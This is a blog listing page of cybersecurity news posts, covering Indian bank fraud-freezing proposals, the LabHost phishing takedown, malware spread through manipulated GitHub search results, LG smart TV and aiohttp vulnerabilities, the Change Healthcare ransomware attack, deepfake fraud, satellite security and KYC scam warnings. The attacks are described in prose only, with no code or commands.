Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Threat Landscape. Show all posts
Threat Landscape
Cyber Crime Financial Fraud India Indian Banks MHA Threat Landscape

Indian Banks Mull New Move for Faster Freezing of Scammers’ Accounts

 

Indian banks have proposed integrating their systems with the National Cybercrime Reporting Portal (NCRP), a division of the ministry of home affairs, which could enable a quicker freeze on fraudulent accounts in the wake of a cyberattack. 

This is intended to prevent those who commit cybercrimes and phishing attacks from swiftly transferring funds from a target's bank account to accounts with various banks before it is withdrawn or spent. This is a tactic employed by voice phishers and cyber shysters to make it more difficult for banks and law enforcement to recover the funds. 

“Banks, in consultation with cybercrime experts, have recommended API integration with the NCRP to reduce the average response time and quick updation of cases. So, the idea is to mark a lien and freeze a bank account automatically without manual intervention,” noted a banker. “An industry sub-group has suggested this to I4C,” said the person. 

I4C, or the Indian Cybercrime Coordination Centre, is an MHA programme that focuses on combating cybercrime and enhancing coordination between law enforcement agencies (LEAs) and institutions such as banks. NCRP is a vertical under I4C.

API, or 'application programming interface', enables two applications or systems to interact with one another without the need for human intervention. If there is an API between a system with specific data and another system that requires reporting, the two can communicate without the need for manual data entry. In the event of a cybercrime, such as a hacked internet banking account, API integration would allow for the quick transmission of fraud information to a central system or other banks. 

“Typically, money from the account where the fraud happens is moved to accounts with several banks. There is a far better chance of retrieving the amount if the information is available with the entire industry instantaneously. The time spent by Bank A awaiting an instruction from a LEA, then sending emails to bank B, C and D, or calling them up, to request a lien on the accounts where funds have gone, can be saved,” noted another banker.

The group has also advised that data on accounts identified as lien and freeze be made available to banks on a regular basis so that they can reconcile their records. 

In this respect, it has been observed that I4C may share a broad standard operating procedure directing banks to place bank accounts on hold, freeze or de-freeze them, and release funds to victims' bank accounts in cases reported to NCRP. Furthermore, it is believed that the nodal organisation should establish guidelines for communicating 'negative account or KYC details' so that accounts are not opened with the same demographics or KYC details as other banks.
Read more »
University Students
Cyber Fraud LabHost Threat Landscape UK Police University Students

International Cyber Fraud Ring Busted By London Police

 

UK Police stated that they have infiltrated a massive phishing website on the dark web that has defrauded tens of thousands of individuals, and learned that university students have turned to cyber fraud as a way to increase their revenue. 

LabHost was a cyber fraud emporium that allowed users to create realistic-looking websites from major names such as big institutions, ensnaring victims all around the world, including 70,000 in the United Kingdom. It has been in operation from 2021. 

Victims entered private data, some of which were used to steal money, but the site's creators also profited by selling details to fraudsters on the dark web.

According to the Metropolitan police, the majority of the victims were between the ages of 25 and 44, and they spent the majority of their time online. Police believe they apprehended one of the site's major suspected masterminds this week, among 37 individuals held in the UK and abroad.

The Metropolitan Police reported that arrests were made at Manchester and Luton airports, as well as in Essex and London. Policing in the UK is under pressure to prove that it is effectively combating the rise in cyber fraud.

The site's infiltration is a drop in the ocean compared to the scope of the problem, but police seek to shake criminals' confidence in their ability to act with impunity and intend to shut down more cyber fraud sites. 

In the midst of struggles for resources against other criminal objectives like protecting children and bolstering what is often viewed as inadequate protection of women, fraud and cybercrime are seen as difficult crimes for law enforcement to solve. 

The Met is currently enjoying its success. The main users of the website have been arrested, and 25,000 victims have been notified in the UK. Some of the users won't be arrested, though, since investigators don't know who they really are.

LabHost collected 480,000 debit or credit card data, and 64,000 pin numbers, and generated £1 million from 2,000 customers who paid up to £300 a month in Bitcoin for membership fees. As a “one-stop-shop for phishing,” it promoted itself.

It included a teaching video on how to use the site to conduct crimes, similar to one on how to use a new consumer product. The video stated that the show takes five minutes to install and that "customer service" was available if there were any issues. It concluded by urging its criminal users, "Stay safe and good spamming.”
Read more »
Threat Landscape
GitHub Malicious Payload malware Repository Scanning Threat Landscape

Hackers Use GitHub Search to Deliver Malware

 

Checkmarx, an application security firm, has discovered that threat actors are altering GitHub search results in order to infect developers with persistent malware.

As part of the campaign, attackers were seen developing fake repositories with popular names and themes, and then boosting their search ranks using automatic updates and fake ratings. 

To avoid detection, the threat actors concealed a harmful payload within Visual Studio project files, resulting in the execution of malware similar to Keyzetsu clipper that targets crypto wallets. The malware is installed continuously on Windows machines and is scheduled to be executed daily. 

The threat actors were observed leveraging GitHub Actions to automatically update the malicious repositories by making minor changes to a file titled 'log', which artificially enhances the repositories' visibility and the possibility of users accessing them. 

Furthermore, the attackers were detected adding fictitious stars to their repositories from various fake identities, tricking users into believing the repositories are popular and genuine. 

“Unsuspecting users, often drawn to the top search results and repositories with seemingly positive engagement, are more likely to click on these malicious repositories and use the code or tools they provide, unaware of the hidden dangers lurking within,” Checkmarx stated. 

The attackers inserted their malicious payload in a Visual Studio project file's pre-build event, causing it to be run automatically across the build process. The payload downloads additional content from certain URLs based on the victim's country, downloads encrypted files from the URLs, extracts and runs their content, and checks the system's IP address to see if it is in Russia. 

On April 3, the attackers began utilising a new URL that pointed to an archived executable file. To avoid detection by security solutions, they padded the executable with an abundance of zeros, preventing scanning.

"The results of our analysis of this malware suggest that the malware contains similarities to the 'Keyzetsu clipper' malware, a relatively new addition to the growing list of crypto wallet clippers commonly distributed through pirated software," Checkmarx said in a press release.

A scheduled task that points to an executable file shortcut is one way that malware tries to remain persistent. Several malicious repositories have received complaints from infected users, suggesting that Checkmarx's effort has been successful. 

In the aftermath of the XZ attack and many other recent incidents, it would be irresponsible for developers to rely solely on reputation as a metric when using open-source code. These incidents highlight the necessity for manual code reviews or the use of specialized tools that perform thorough code inspections for malware,” Checkmarx added.
Read more »
Threat Landscape
CISO Cyber Security data science Penetration Testing Threat Landscape

Offensive Security Necessitates a Data-driven Approach for CISOs

 

There remains a significant disparity in utilisation of resources between defensive and offensive cybersecurity technologies. When comparing the return on investment (ROI) for defensive and offensive investments, security experts discovered that offensive security routinely outperforms defensive security. For example, penetration testing not only identifies vulnerabilities, but it also addresses and seals potential access sites for hackers. 

This recognition should drive organisations and their security leaders to consider why there is so little investment in offensive security solutions. Many CISOs recognise a clear market gap in offensive security tactics, with acquired tooling fatigue unable to satisfy the changing needs of modern enterprises. CISOs must now look into how a data-driven approach may generate a proven ROI for each offensive security expenditure they make. 

Data science and cybersecurity: A powerful duo

In an era of digital transformation and networked systems, cybersecurity incidents have increased tremendously. Businesses face a slew of dangers, including unauthorised access and malware attacks. To tackle this, data science may give analytics that assist security leaders in making informed decisions about their cyber resiliency plans and tactics. 

Data analytics, whether powered by security providers and in-house technology like AI/ML or threat intelligence feeds, entails identifying patterns and insights from cybersecurity data, generating data-driven models, and developing intelligent security systems. By analysing relevant data sources from security testing across assets, systems, customers, and industries (including network activity, database logs, application behaviour, and user interactions), they may deliver actionable intelligence to secure their assets.

However, the most significant component of data analytics is that it improves data-driven decision-making by giving much-needed context and proof behind user behaviours, whether authorised or unauthorised. Data-Driven Decision Making in Offensive Security Data-driven decision-making is the foundation for effective offensive security. Here's how it takes place.

• Threat Intelligence: Data analytics allows organisations to gather, process, and analyse threat intelligence. Defenders obtain real-time insights from monitoring indicators of compromise (IoCs), attack patterns, and vulnerabilities. These findings inform proactive steps like fixing key vulnerabilities and modifying security rules. 

• Behavioural analytics: Understanding user behaviour is critical. Data-driven models detect anomalies and highlight questionable activities. For example, unexpected spikes in data exfiltration or atypical login patterns will prompt an alarm. Behavioural analytics can also help uncover insider threats, which are becoming increasingly prevalent. 

Challenges and future directions 

While data analytics can boost offensive security and decision-making, major challenges persist. Data quality is critical for accurate and actionable intelligence; as the phrase goes, "Garbage in, garbage out." Balancing privacy and ethics can also be difficult, but because security testing data should be free of PII, this should not be the primary focus, but rather intelligence that can help make better decisions.

Ultimately, offensive security practitioners must anticipate adversary attacks. However, the future seems promising, as data analytics can propel offensive security as a viable and evidence-based strategy. With analytics, security executives can proactively defend against attacks. As threats develop, so should our data-driven defences.
Read more »
Vulnerabilities and Exploits
IoT devices Smart TV Threat Landscape Unauthorized access Vulnerabilities and Exploits

91,000 Smart LG TV Devices Susceptible to Unauthorised Remote Access

 

New vulnerabilities have been discovered in LG TVs that could allow unauthorised access to the devices' root systems, possibly exposing thousands of units worldwide. 

The finding, made as part of Bitdefender's continuing inspection of the popular Internet of Things (IoT) technology, focuses on vulnerabilities in WebOS versions 4-7, which are used in LG sets. The detected flaws allow unauthorised access to the TV's root system by circumventing the permission process. 

Despite its intended use for LAN access only, Shodan, an internet-connected device search engine, has identified over 91,000 devices that expose this service to the internet. 

Among the uncovered flaws, CVE-2023-6317 stands out because it allows attackers to bypass authorization methods, allowing unauthorised access to the TV's root system. Additionally, CVE-2023-6318 enables attackers to extend their access to root privileges, heightening the security risk. 

Furthermore, CVE-2023-6319 allows for the injection of operating system commands, whilst CVE-2023-6320 enables authenticated command injection. The concerned models are LG43UM7000PLA, OLED55CXPUA, OLED48C1PUB, and OLED55A23LA. Devices running WebOS versions 4.9.7 through 7.3.1 have been confirmed to be impacted. 

“Attackers could use the compromised Smart TV as a starting point to launch additional attacks against remote systems or hosts,” noted Thomas Richards, principal security consultant at the Synopsys Software Integrity Group.

According to the cybersecurity expert, if attackers get administrator access to the TV, the user's personal information, including login passwords, can be compromised. 

“Smart TV owners should not have their TVs directly connected to the internet. Keeping the TV behind a router will reduce the likelihood of a compromise since remote attackers will not be able to reach it,” Richards added. “Enabling the automatic update option on the TV will keep the TV up to date with vendor patches to remediate security risks.” 

Bitdefender's disclosure timetable highlighted the approach followed, with vendor notice taking place on November 1, 2023, some months before a fix delivery on March 22, 2024. In the face of emerging threats, prompt patching and upgrades are critical to minimising possible risks, safeguarding user privacy, and enhancing device security.
Read more »
Threat Landscape
CISA Cyber Attacks LOTL Attacks Sophisticated Assaults Threat Landscape

Living-Off-the-Land (LOTL) Attacks: Here's Everything You Need to Know

 

In the unrelenting fight of cybersecurity, cyberattacks continue to become more elusive and sophisticated. Among these, threat actors who use Living Off the Land (LOTL) strategies have emerged as strong adversaries, exploiting legitimate system features and functionalities to stealthily compromise networks. 

As defenders deal with this stealthy threat, a new study from the Cybersecurity and Infrastructure Security Agency (CISA) sheds light on the tactics, methods, and procedures (TTPs) used by attackers and provides critical insights into recognising and combating LOTL attacks. LOTL attacks use pre-existing software and legitimate system tools to carry out malicious actions, allowing attackers to go undetected amid the chaos of network traffic. 

Rather than creating proprietary malware or tools, attackers take advantage of built-in programmes such as PowerShell, which has been accessible on all Windows operating systems since November 2006. 

Benefits of leveraging existing tools in cyber attacks 

The appeal of employing existing technologies stems from their widespread availability and familiarity inside enterprise environments. These tools enable simple access to both local and domain-based setups, allowing attackers to automate administrative activities and execute commands with ease. By using these tools, attackers avoid the time-consuming process of developing, testing, and distributing specialised tools, saving both time and resources. 

Furthermore, the intrinsic complexity of developing and distributing tooling across numerous operating systems and environments presents a significant challenge for cybercriminals. By leveraging existing tools, attackers avoid the need to address compatibility issues, dependencies, and potential detection systems. This method significantly lowers the chance of discovery because built-in tools blend smoothly into regular system activity, making it difficult for defenders to distinguish between authorised and malicious use. 

Prevention tips

It is impossible to overestimate the importance of mitigating LOTL tactics in light of the latest Volt Typhoon study published by CISA. Defenders need to be proactive and alert as cyber attackers continue to hone their strategies and identify vulnerabilities in organisational defences. 

Organisations can fortify their defences and mitigate the risks posed by LOTL attacks by utilising the insights in the research and implementing a defence-in-depth security strategy. Here's how organisations can successfully defend against LOTL attacks. 

Visibility is critical: relying just on preventative technology is insufficient to combat attackers that use authorised tools. Visibility into all operations throughout the entire infrastructure is required to detect and mitigate such risks. 

Identifying authorised users: Determine who should be utilising tools that can be used to launch LOTL attacks, such as scripting languages or administrative tools. 

Enable comprehensive logging: Use granular logging to monitor LOTL tool usage. For example, enabling enhanced logging for PowerShell scripting yields useful information.
Read more »
Threat Landscape
Business Security CISO Cyber Security Dark Web Data Privacy Threat Landscape

Here's Why Tracking Everything on the Dark Web Is Vital

 

Today, one of the standard cybersecurity tools is to constantly monitor the Dark Web - the global go-to destination for criminals - for any clues that the trade secrets and other intellectual property belonging to the organisation have been compromised. 

The issue lies in the fact that the majority of chief information security officers (CISOs) and security operations centre (SOC) managers generally assume that any discovery of sensitive company data indicates that their enterprise systems have been successfully compromised. That's what it might very well mean, but it could also mean a hundred different things. The data may have been stolen from a supply chain partner, a corporate cloud site, a shadow cloud site, an employee's home laptop, a corporate backup provider, a corporate disaster recovery firm, a smartphone, or even a thumb drive that was pilfered from a car.

When dealing with everyday intellectual property, such as consumer personal identifiable information (PII), healthcare data, credit card credentials, or designs for a military weapons system, knowing that some version of it has been acquired is useful. However, it is nearly hard to know what to do unless the location, timing, and manner of the theft are known. 

In some cases, the answer could be "nothing." Consider some of your system's most sensitive files, including API keys, access tokens, passwords, encryption/decryption keys, and access credentials. If everything is carefully recorded and logged, your team may find that the discovered Dark Web secrets have already been systematically deleted. There would be no need for any further move.

Getting the info right

Most CISOs recognise that discovering secrets on the Dark Web indicates that they have been compromised. However, in the absence of correct details, they frequently overreact — or improperly react — and implement costly and disruptive modifications that may be entirely unnecessary. 

This could even include relying on wrong assumptions to make regulatory compliance disclosures, such as the European Union's General Data Protection Regulation (GDPR) and the Securities and Exchange Commission's (SEC) cybersecurity obligations. This has the potential to subject the organisation to stock drops and compliance fines that are avoidable. 

Establishing best practices

You must keep a tightly controlled inventory of all of your secrets, including intricate and meticulous hashing techniques to trace all usage and activity. This is the only way to keep track of all activity involving your machine credentials in real time. If you do this aggressively, you should be able to detect a stolen machine credential before it reaches the Dark Web and is sold to the highest bidder.

Another good strategy is to regularly attack the Dark Web — and other evil-doers' dens — with false files to add a lot of noise to the mix. Some discriminating bad guys may avoid your data totally if they are unsure if it is genuine or not.
Read more »
Vulnerabilities and Exploits
Aiohttp Ransomware Shadowssyndicate Threat Landscape Vulnerabilities and Exploits

Threat Actors Exploit the Aiohttp Bug to Locate Susceptible Networks

 

The ransomware actor "ShadowSyndicate" was observed searching for servers that could be exposed to the aiohttp Python library's directory traversal vulnerability, CVE-2024-23334. 

Aiohttp is an open-source toolkit designed to manage massively concurrent HTTP requests without the need for conventional thread-based networking. It is built on top of Python's Asyncio asynchronous I/O framework. 

Tech companies, web developers, data scientists, and backend engineers use it to create high-performance web applications and services that combine data gathered from numerous external APIs. 

On January 28, 2024, aiohttp published version 3.9.2, which addressed CVE-2024-23334, a high-severity path traversal issue that affects all versions of aiohttp from 3.9.1 and earlier and enables unauthenticated remote hackers to access files on susceptible servers. 

When 'follow_symlinks' is set to 'True' for static routes, there is insufficient validation, which leads to an unauthorised access to files located outside the server's static root directory On February 27, 2024, a researcher published a proof-of-concept (PoC) exploit for CVE-2024-23334 on GitHub, and a thorough video demonstrating step-by-step exploitation instructions was published on YouTube in early March.

Cyble's threat analysts indicate that their scanners detected exploitation attempts targeting CVE-2024-23334 beginning on February 29 and continuing at an increasing pace throughout March.

The scanning efforts originate from five IP addresses, one of which was identified in a Group-IB report from September 2023 as belonging to the Shadowsyndicate ransomware perpetrator. 

ShadowSyndicate is an opportunistic, financially motivated threat actor who has been active since July 2022 and has been associated to an array of ransomware variants, including Quantum, Nokoyawa, BlackCat/ALPHV, Clop, Royal, Cactus, and Play. Group-IB suspects the threat actor is an affiliate involved in numerous ransomware operations. 

Cyble's findings, while not conclusive, suggests that threat actors may be conducting scans on servers using a compromised version of the aiohttp library. Whether or whether these scans result in breaches is unknown at this moment. 

In terms of the attack surface, Cyble's internet scanner ODIN shows that there are around 44,170 internet-exposed aiohttp instances worldwide. The majority (15.8%) are in the United States, followed by Germany (8%), Spain (5.7%), the United Kingdom, Italy, France, Russia, and China.
Read more »
Threat Landscape
American HealthCare Change Healthcare Cyber Attacks Ransomware attack Threat Landscape

Change Healthcare Detects Ransomware Attack Vector

 

The cyberattack's widespread destruction underscores how threat actors can do significant damage by targeting a relatively unknown vendor that serves a vital operational function behind the scenes.

The AlphV ransomware group disrupted basic operations to the critical systems of US healthcare services by attacking a vital financial and claims processing link in a highly interconnected industry. The outage and cascading effects of the cyberattack on the healthcare IT systems continued into the fourth week on Thursday.

UnitedHealth Group reported unauthorised access on its systems on February 21. The reconnecting and testing of Change's claims systems will be completed in phases next week.

The US Department of Health and Human Services launched an inquiry into the incident on Wednesday to investigate whether protected health information was stolen and if Change met privacy and security standards. 

The department's Office for Civil Rights (OCR) announced the investigation in a letter on Wednesday, with Director Melanie Fontes Rainer writing that it was necessary to look into the situation "given the unprecedented magnitude of this cyberattack, and in the best interests of patients and health care providers." 

The statement comes following a crisis meeting on Tuesday with White House officials, medical sector leaders, HHS Secretary Xavier Becerra, and Andrew Witty, CEO of UnitedHealth Group, Change Healthcare's parent company. 

According to Fontes Rainer, the investigation will focus on whether protected health information was compromised and if Change Healthcare and UHG followed Health Insurance Portability and Accountability Act (HIPAA) requirements. 

“OCR’s interest in other entities that have partnered with Change Healthcare and UHG is secondary. While OCR is not prioritizing investigations of healthcare providers, health plans, and business associates that were tied to or impacted by this attack, we are reminding entities that have partnered with Change Healthcare and UHG of their regulatory obligations and responsibilities, including ensuring that business associate agreements are in place and that timely breach notification to HHS and affected individuals occurs as required by the HIPAA Rules,” Rainer said. 

The American Hospital Association referred to the attack as the most significant and consequential incident of its kind against the U.S. healthcare system in history.
Read more »
United States
American Medical Association Cyber Attacks Health Care Firm Threat Landscape United States

Cyberattack is Wreaking Havoc on US HealthCare Providers.

 

Following a cyberattack on the largest health insurer in the United States last month, health care providers are still scrambling as insurance payments and prescription orders continue to be disrupted, costing physicians an estimated $100 million each day. 

According to the American Medical Association, that estimate was generated by First Health Advisory, a cybersecurity company that focuses on the healthcare sector.

"This massive breach and its wide-ranging repercussions have hit physician practices across the country, risking patients' access to their doctors and straining the viability of medical practices themselves," AMA President Dr. Jesse Ehrenfeld stated in a news release. 

"Against the backdrop of persistent Medicare cuts, rising practice costs and spiraling regulatory burdens, this unparalleled cyberattack and disruption threatens the viability of many practices, particularly small practices and those in rural and underserved areas," he added. "This is an immense crisis demanding immediate attention.” 

How did the crisis start? 

First discovered on February 21, the security breach occurred at Change Healthcare, a division of Optum Inc., which is owned by UnitedHealth Group. 

UnitedHealth Group informed government officials that it had been compelled to cut off portions of Change Healthcare's extensive digital network from its clients in a report that was submitted to the U.S. Securities and Exchange Commission on that same day. Not every one of those services has been able to be restored yet.

Change Healthcare stated that it is aiming to restore the provider payment systems by the middle of March in its most recent report regarding the attack. 

"UnitedHealth Group continues to make substantial progress in mitigating the impact to consumers and care providers of the unprecedented cyberattack on the U.S. health system and the Change Healthcare claims and payment infrastructure," the company noted in a statement.

The federal government intervened to provide assistance two weeks following the attack. The U.S. Department of Health and Human Services unveiled a number of support initiatives for impacted healthcare providers on March 5. 

"The government is trying to create some support for health care systems -- not directly supporting patients, but the systems," Dr. Céline Gounder, an editor-at-large for public health at KFF Health News and a CBS News medical contributor, stated. "This is because without revenue coming in through the billing process, you don't have money to make payroll to be able to pay your doctors and your nurses and your janitors and all the staff that you need to run a health care system.”

Unfortunately, this incident will probably not be the last. According to federal officials, big healthcare data breaches have nearly doubled between 2018 and 2022. 
Read more »
US infrastructure
AI technology Cyber Security Cyber Threats Threat Landscape US infrastructure

Experts Issue Warning Regarding Rising Threat of AI-Driven Cyber-Physical Attacks

 

As artificial intelligence (AI) technologies advance, researchers are voicing concerns about the possibility of AI-fueled cyber-physical attacks on critical US infrastructure. Last month, the FBI warned that Chinese hackers might impair critical sectors such as water treatment, electrical, and transportation infrastructure. MIT's Stuart Madnick, an influential authority in cybersecurity, stresses that these concerns could transcend beyond digital damage and pose real threats to national security. 

Emerging threats to cybersecurity

The integration of AI into hacking strategies is changing the cybersecurity landscape, resulting in more complex and potentially destructive attacks. Madnick's research at MIT Sloan's CAMS has revealed that cyberattacks can now cause physical harm, such as explosions in lab settings, by manipulating computer-controlled equipment. This differs from traditional cyberattacks, which only briefly impair services, and highlights the rising threat of long-term damage to critical infrastructure. 

AI's role in rising threats 

Hackers now have more tools at their disposal to craft attacks that evade security measures due to the advancement of AI technologies. Tim Chase, CISO of Lacework, highlights how AI-driven manipulations could impact systems that use programmable logic controllers (PLCs). A major worry is that AI could make it possible for even intermediate hackers to physically harm industrial and healthcare systems, especially considering how dependent these industries are on antiquated systems that have little defence against such attacks. 

Call for robust security procedures

Enhanced cybersecurity solutions are desperately needed in light of these emerging risks. Using AI-powered security tools like anomaly detection and predictive maintenance is vital for mitigating physical and cyberattacks. The federal government's warnings to state election authorities also highlight the significance of staying vigilant and prepared to defend not just the physical infrastructure but also the integrity of democratic processes. 

As the possibility of AI-driven cyber-physical attacks rises, the need for better security measures becomes more pressing. Collaboration among government, industry, and cybersecurity professionals is critical for developing and implementing solutions to combat the rising threats posed by AI-enhanced cyberattacks. The stakes are high, as national infrastructure and the democratic fabric of society are compromised.
Read more »
Threat Landscape
Canada City of Hamilton Cyber Attacks Cyber Warfare Threat Landscape

Hamilton City's Network is the Latest Casualty of the Global Cyberwar.

 

The attack that took down a large portion of the City of Hamilton's digital network is only the latest weapon in a global fight against cybersecurity, claims one of Canada's leading cybersecurity experts. 

Regarding the unprecedented attack on the municipality's network that affected emergency services operations, the public library website, and the phone lines of council members, not much has been stated by city officials. Although the specifics of the Sunday incident are yet unknown, Charles Finlay, executive director of Rogers Cybersecure Catalyst, believes that the attack is a part of a larger campaign against a shadow firm that is determined to steal money and data. 

“I don't think that the average citizen of Hamilton or any other city, fully understands what's at play here,” Finlay stated. “Our security services certainly are, but I don't think the average citizen is aware of the fact that institutions in Canada, including Hamilton, are at the front lines of what amounts to a global cybersecurity conflict.” 

On Sunday, city hall revealed service delays caused by what it later described as a "cybersecurity incident" that had far-reaching consequences for the city's network and related services. 

The specifics of what took place, however, remain unknown as local officials maintain a cloak of secrecy. So far, the city has refused to divulge the amount of the damage or how affected departments are operating. Emergency services are described as "operational," with some activities now being completed "manually," but officials refuse to disclose specifics.

The city also refuses to reveal whether sensitive data was stolen or is being held ransom.

According to Vanessa Iafolla of Halifax-based Anti-Fraud Intelligence Consulting, a municipality may prefer to delay reporting the extent of the harm in order to preserve an impression of security and control. 

Finlay and Iafolla said they can only speculate about what transpired because city hall hasn't provided any information. However, given the available details and the consequences of other institutions' attacks, a ransomware attack is a realistic possibility. 

A ransomware assault is one in which malicious software is installed on a network, allowing users to scan and grab sensitive data. In the case of the city, Iafolla could refer to personal information on employees and citizens, such as social insurance numbers and other identifying information.

“It's a safe bet that whatever they took is likely of real financial value,” concluded Iafolla. “It's difficult to speculate exactly what may have been taken, but I would be pretty confident in thinking whatever it is, is going to be a hot commodity.”
Read more »
Threat Landscape
Cyber space DDOS Attack Security Framework Technology Threat Landscape

Here's Why Robust Space Security Framework is Need of the Hour

 

Satellite systems are critical for communication, weather monitoring, navigation, Internet access, and numerous other purposes. These systems, however, suffer multiple challenges that jeopardise their security and integrity. To tackle these challenges, we must establish a strong cybersecurity framework to safeguard satellite operations.

Cyber threats to satellites 

Satellite systems suffer a wide range of threats, including denial-of-service (DoS) attacks and malware infiltration, as well as unauthorised access and damage triggered by other objects in their orbit that hinder digital communications. 

For satellite systems, these major threats can distort sensor systems, resulting in harmful actions based on inaccurate data. For example, a faulty sensor system could cause a satellite's orbit path to collide with another satellite or natural space object. If a sensor system fails, it may result in the failure of other space and terrestrial systems that rely on it. Jamming or sending unauthorised satellite guidance and control commands has the potential to destroy other orbiting space spacecraft.

DoS attacks can lead satellites to become unresponsive or, worse, shut down. Satellite debris fallout could pose a physical safety risk and damage to other countries' space vehicles or the earth. Malware installed within systems via insufficiently secured access points may have an influence on the satellite and spread to other systems with which it communicates. 

Many of the 45,000 satellites have been in service for years and have minimal (if any) built-in cybersecurity protection. Consider the Vanguard 1 (1958 Beta 2), a small, solar-powered satellite that orbits Earth. It was launched by the United States on March 17, 1958, and is the oldest satellite still orbiting the earth.

Given potential risks that satellites face, a comprehensive cybersecurity strategy is required to mitigate such risks. Engineering universities and tech organisations must also work with government agencies and other entities that design and build satellites to develop and execute a comprehensive cybersecurity, privacy, and resilience framework to regulate industries that are expanding their use of space vehicles. 

Cybersecurity framework

The NIST Cybersecurity Framework (CSF) outlines five critical processes for mitigating common threats, including those related with satellite systems: identify, protect, detect, respond, and recover.

Identify

First, identify the satellite data, individuals, personnel, systems, and facilities that support the satellite's uses goals, and objectives. Document the location of each satellite, as well as the links between each satellite component and other systems. Knowing which data is involved and how it is encrypted can help with contingency, continuity, and disaster recovery planning. Finally, understand your risk landscape and any elements that may affect the mission so that you can plan for and avoid potential incidents. This information will aid in the successful management of cybersecurity risk for satellite systems and its associated components, assets, data, and capabilities. 

Protect

Using the recently identified data, choose, develop, and implement the satellite's security ecosystem to best protect all of its components and associated services. Be aware that traditional space operations and vehicles typically rely on proprietary software and hardware that were not intended for a highly networked satellite, cyber, and data environment. As a result, legacy components may lack certain security measures. As a result, create, design, and use verification procedures to prevent loss of assurance or functionality in satellite systems' physical, logical, and ground parts, as well as to allow for response to and recovery from cybersecurity incidents. To protect satellite systems, physical and logical components must be secured, access limits monitored, and cybersecurity training made available.

Detect 

Create and implement relevant actions to monitor satellite systems, connections, and physical components for unforeseen incidents and alert users and applications of their detection. Use monitoring to spot anomalies within space components, and put in place a strategy for dealing with them. Use many sensors and sources to correlate events, monitor satellite information systems, and maintain access to ground segment facilities in order to detect potential security breaches. 

Respond

Take appropriate actions to mitigate the impact of a cybersecurity attack or unusual incident on a satellite system, ground network, or digital ecosystem. Cybersecurity teams should inform key stakeholders regarding the incident and its implications. They should also put in place systems for responding to and mitigating new, known, and anticipated threats or vulnerabilities, as well as continuously improving these processes based on lessons learned. 

Recover 

Create and implement necessary activities to preserve cybersecurity and resilience, as well as to restore any capabilities or services that have been impaired as a result of a cybersecurity event. The objectives are to quickly restore satellite systems and associated components to normal functioning, return the organisation to its appropriate operational state, and prevent the same type of incident from recurring.

As our world continues to rely on satellite technology, cyber threats will emerge and adapt. It is critical to safeguard these systems by developing a comprehensive cybersecurity framework that outlines the way to design, create, and operate them. Such a structure enables organisations to respond effectively to incidents, recover swiftly from interruptions, and remain ahead of potential threats.
Read more »
User Security
Cyber Crime Deep Fakes Identity Hijack Identity Theft Threat Landscape User Security

Identity Hijack: The Next Generation of Identity Theft

 

Synthetic representations of people's likenesses, or "deepfake" technology, are not new. Picture Mark Hamill's 2019 "The Mandalorian" episode where he played a youthful Luke Skywalker, de-aged. Similarly, artificial intelligence is not a novel concept. 

However, ChatGPT's launch at the end of 2022 made AI technology widely available at a low cost, which in turn sparked a competition to develop more potent models among almost all of the mega-cap tech companies (as well as a number of startups). 

Several experts have been speaking concerning the risks and active threats posed by the current expansion of AI for months, including rising socio economic imbalance, economic upheaval, algorithmic discrimination, misinformation, political instability, and a new era of fraud. 

Over the last year, there have been numerous reports of AI-generated deepfake fraud in a variety of formats, including attempts to extort money from innocent consumers, ridiculing artists, and embarrassing celebrities on a large scale. 

According to Australian Federal Police (AFP), scammers using AI-generated deepfake technology stole nearly $25 million from a multinational firm in Hong Kong last week.

A finance employee at the company moved $25 million into specific bank accounts after speaking with several senior managers, including the company's chief financial officer, via video conference call. Apart from the worker, no one on the call was genuine. 

Despite his initial suspicions, the people on the line appeared and sounded like coworkers he recognised.

"Scammers found publicly available video and audio of the impersonation targets on YouTube, then used deepfake technology to emulate their voices... to lure the victim into following their instructions," acting Senior Superintendent Baron Chan told reporters. 

Lou Steinberg, a deepfake AI expert and the founder of cyber research firm CTM Insights, believes that as AI grows stronger, the situation will worsen. 

"In 2024, AI will run for President, the Senate, the House and the Governor of several states. Not as a named candidate, but by pretending to be a real candidate," Steinberg stated. "We've gone from worrying about politicians lying to us to scammers lying about what politicians said .... and backing up their lies with AI-generated fake 'proof.'" 

"It's 'identity hijacking,' the next generation of identity theft, in which your digital likeness is recreated and fraudulently misused," he added. 

The best defence against static deepfake images, he said, is to embed micro-fingerprint technology into camera apps, which would allow social media platforms to recognise when an image is genuine and when it has been tampered with. 

When it comes to interactive deepfakes (phone calls and videos), Steinberg believes the simple solution is to create a code word that can be employed between family members and friends. 

Companies, such as the Hong Kong corporation, should develop rules to handle nonstandard payment requests that require codewords or confirmations via a different channel, according to Steinberg. A video call cannot be trusted on its own; the officers involved should be called separately and immediately.
Read more »
User Privacy
Cyber Fraud Financial Data KYC Scam RBI Threat Landscape User Privacy

RBI Issues Warning Against Scam Via KYC trick

 

On February 2, 2024, the Reserve Bank of India (RBI) reiterated its prior warning to the public, offering further suggestions in response to a rising tide of scams involving Know Your Customer (KYC) updates. RBI amplified the cautionary tips issued earlier to the public on September 13, 2021, citing continuing incidents/reports of consumers falling victim to scams being perpetrated in the name of KYC updation. 

Modus operandi 

Customers typically receive unsolicited calls, texts, or emails requesting personal information, account or login credentials, or the installation of unapproved apps via links in the message. 

Frequently, the messages intentionally instil a false feeling of urgency by threatening to freeze or close the customer's account if they don't cooperate. Customers provide fraudsters unauthorised access to their accounts and enable them to commit fraudulent operations when they divulge critical private details or login credentials. 

Quick reporting 

The Reserve Bank of India (RBI) advised victims of financial cyber fraud to report the incident right away on the National Cyber Crime Reporting Portal (www.cybercrime.gov.in) or by calling the cybercrime hotline in 1930. 

Preventive measures 

To prevent people from becoming victims of KYC fraud, the RBI published a list of dos and don'ts. Critical data such as card details, PINs, passwords, OTPs, and account login credentials should never be shared with third parties, the RBI cautions the public. 

Individuals are also advised not to click on dubious or unverified links they receive via email or mobile devices, nor share KYC documents with unrecognised or unknown parties. "Do not share any sensitive information through unverified/unauthorised websites or applications," the central bank advised.

For confirmation and help, get in touch with the bank or financial institution immediately when you get a request for KYC updates. Get phone numbers for customer service or contact information exclusively from the official website or other sources. Report any incidents of cyber fraud to the bank right away. Ask the bank about the possible ways to update your KYC information.
Read more »
UK Firms
Business Security Corporate Finance Cyber Security Data Safety Threat Landscape UK Firms

City Cyber Taskforce Introduced to Safeguard Corporate Finance in UK

 

Two of the UK's main accounting and security agencies are forming a new taskforce today to help organisations enhance the security of their corporate finance transactions. 

